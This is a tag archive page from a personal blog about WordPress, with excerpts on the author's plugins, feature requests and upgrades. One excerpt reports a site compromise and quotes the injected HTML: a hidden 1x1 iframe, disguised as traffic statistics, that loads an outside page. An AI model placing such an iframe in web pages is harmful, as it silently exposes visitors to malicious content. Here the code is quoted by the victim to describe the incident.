Posts tagged as:

wordpress

annoying html injection in wordpress

September 13, 2009

two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows: <!– Traffic Statistics –> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –> I only became aware of it when Google flagged my archives for that month as [...]

Read the full article →

Tags to Hashtags

August 21, 2009

I’ve written a new plugin for wordpress entitled “AHP Tags to Hashtags” for use with WordPress and WordPress MU. The plugin can be found for now at pastebin here, I will update when it’s been added to the official wordpress plugin repository. The plugin appends the tags for each post to the post title in [...]

Read the full article →

monetizing WPMU

February 6, 2009

There’s a great conversation at WPMU.org about how to make money using WordPress MU – James starts by noting that advertising doesn’t cover the hosting costs for a massively successful site, and goes into the various other ways in which they derive revenue, including selling extra features to paid users and selling custom plugins (that [...]

Read the full article →

Please vote for my plugin

September 26, 2008

My plugin, AHP Sitewide Recent Posts, is an entrant in the WPMU.org plugin competition. I would greatly appreciate your support! Please cast your vote here and vote for “Yet Another Posts Plugin“. Thank you!

Read the full article →

AHP Sitewide Recent Posts plugin for WordPress MU

September 17, 2008

Building on the venerable Recent Posts plugin by Ron and Andrea, I have created an extended version that offers a lot more user control over output, including gravatar support. The basic features are: excludes posts on main blog (blog ID = 1) excludes first posts (Hello, world) on user blogs (post ID = 1) option [...]

Read the full article →

RSS-based comment moderation?

August 1, 2008

I just left the following ticket on WordPress Trac, as a feature request: RSS feeds are already generated for posts and comments by default. What would be very helpful woudl be a dedicated RSS feed for comments in the moderation queue. This would permit efficient queue processing without having to log into the Dashboard. For [...]

Read the full article →

plugin wanted: Author Tags

June 30, 2008

Had another idea for a useful plugin – what is needed is a plugin that creates a tag cloud/tag list on a per author basis. This would be especially useful for group blogging sites (like Talk Islam). The plugin would ideally allow a simple function call with arguments: – user name (login) – number of [...]

Read the full article →

beyond the tag cloud: the tagdex

April 12, 2008

I think tag clouds are somewhat useless, to be honest. They are a nice way to fill up a bit of space in a sidebar, if you restrict the cloud to the top 25 or so, but unless the writer is imposing a strict taxonomy on themselves, ultimately the size of the cloud will balloon [...]

Read the full article →

upgraded to WordPress 2.5

March 30, 2008

Thus far everything seems to be working smoothly. All my plugins are working fine that I can see (knock on wood). The new layout and aesthetics are quite clean and nice. I also like the widgetized Dashboard. I’ll just jump in start using it and see what my thoughts are after a week.

Read the full article →

wavatars updated

March 26, 2008

Shamus announces an update to his wavatars plugin. However, as noted earlier, the pending release of WordPress 2.5 will likely break most avatar plugins due to its built-in avatar support. It think it makes more sense to wait for the post-upgrade version of wavatars for the time being; I still would like to see a [...]

Read the full article →